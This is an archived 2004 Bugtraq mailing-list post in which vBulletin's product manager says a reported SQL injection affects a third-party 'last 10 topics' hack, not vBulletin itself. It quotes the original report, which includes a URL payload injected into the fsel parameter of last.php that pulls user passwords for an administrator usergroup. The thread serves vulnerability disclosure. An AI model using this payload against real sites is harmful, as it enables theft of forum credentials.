Vulnerability not with vBulletin

From: Kier Darby (kier_at_vbulletin.com)
Date: 11/12/04

  • Next message: KF_lists: "Re: Unsecure Ftpd on HP PSC 2510 Printer"
    To: <bugtraq@securityfocus.com>
    Date: Fri, 12 Nov 2004 15:00:24 -0000
    
    

    The vulnerability listed here is in a third-party 'hack' script, which is
    not part of vBulletin itself, and is beyond the control of the vBulletin
    developers.

    ___________________________
    Kier Darby
    Product Manager, vBulletin
     
    >From: "Dr. Death"
    >To: bugtraq@securityfocus.com
    >Subject: SQL injection in vBulletin forums (last10.php)
    >Date: Thu, 11 Nov 2004 05:29:44 +0000
    >
    >hi all,
    >
    >a new SQL injection found in VBulletin Forums 3.0.x
    >
    >the Vulnerabilite found in last.php, last 10 topics hack.
    >
    >
    >last.php?fsel=,user.password%20as%20title,user.%20
    >%20%20%20username%20as%20lastposter%20FROM%20user,
    >thread%20%20%20%20%20WHERE%20usergroupid=6%20LIMIT %201
    >
    >to solve the problem delet fsel? from ttlast.php and last10.php
    >
    >Best Regards,
    >Dr.Death
    >THE MAN OF THE DARK SIDE
    >
    >


  • Next message: KF_lists: "Re: Unsecure Ftpd on HP PSC 2510 Printer"

    Relevant Pages


  • Quantcast